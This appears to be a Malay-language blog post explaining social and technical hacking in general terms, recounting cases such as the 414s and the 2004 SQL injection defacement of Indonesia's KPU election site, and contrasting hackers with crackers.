1. Social Hacking, yang perlu diketahui : informasi tentang sistem apa yang dipergunakan oleh server, siapa pemilik server, siapa Admin yang mengelolai server, koneksi yang dipergunakan jenis apa & bagaimana server itu tersambung ke internet, mempergunakan koneksi tersebut & informasi apa saja yang disediakan oleh server tersebut, apakah server tersebut juga tersambung dengan LAN di sebuah organisasi dan informasi lainnya.
2. Technical Hacking, merupakan tindakan teknik untuk melakukan pencerobohan ke dalam sistem, baik dengan alat bantu (tool) atau dengan mempergunakan kemudahan sistem itu sendiri yang dipergunakan untuk menyerang kelemahan (lubang keamanan) yang terdapat dalam sistem atau service. Inti dari kegiatan ini adalah untuk mendapatkan akses penuh ke dalam sistem dengan cara apapun dan bagaimana pun.



Contoh Kes Hacker


1. Pada tahun 1983, pertama kalinya FBI menangkap kelompok penjenayah komputer The 414s(414 merupakan kod area lokal mereka) yang bertapak di Milwaukee AS. Kelompok yang kemudian disebut hacker tersebut melakukan pencerobohan 60 buah komputer, dari komputer milik Pusat Kanser Memorial Sloan-Kettering hingga komputer milik Laboratorium Nasional Los Alamos. Salah seorang dari antara pelaku tersebut mendapatkan pembelaan kerana testimonialnya, sedangkan 5 pelaku yang lain mendapatkan hukuman semasa percubaan.


2. Digigumi (Grup Digital) adalah sebuah kelompok yang mengkhususkan diri bergerak dalam bidang game dan komputer dengan menggunakan teknik-teknik hexadecimal untuk mengubah teks yang terdapat di dalam game. Contohnya : game Chrono Trigger berbahasa Inggeris dapat diubah menjadi bahasa Indonesia. Oleh kerana itu, status Digigumi adalah hacker, namun bukan sebagai perosak.


3. Pada hari Sabtu, 17 April 2004, Dani Firmansyah, konsultan Teknologi Informasi (TI) PT Danareksa di Jakarta berhasil menceroboh laman sesawang milik Komisi Pemilihan Umum (KPU) di http://tnp.kpu.go.id dan mengubah nama-nama parti di dalamnya menjadi nama-nama “unik”, seperti Parti Kolor Ijo, Parti Mbah Jambon, Parti Jambu, dan lain-lain. Dani menggunakan teknik SQL Injection (pada dasarnya teknik tersebut adalah dengan cara membuat string atau perintah tertentu di address bar browser) untuk menceroboh laman sesawang KPU. Kemudian Dani tertangkap pada hari Khamis, 22 April 2004.


Akibat yang Ditimbulkan oleh Hacker dan Cracker


Hacker : membuat teknologi internet semakin maju kerana hacker menggunakan kepakarannya dalam bidang komputer untuk melihat, menemukan dan memperbaiki kelemahan sistem keamanan dalam sesebuah sistem komputer ataupun dalam software, membuat keseronokan bekerja seorang administrator kembali hidup kerana hacker membantu administrator untuk memperkuatkan jaringan mereka.
Cracker : merosak dan melumpuhkan keseluruhan sistem komputer, sehingga data-data pengguna jaringan rosak, hilang, ataupun berubah.


p/s: Maaf, sumber tak dapat dinyatakan kerana ini adalah artikel lama, dah lupa dari mana dapat sumber entri ni.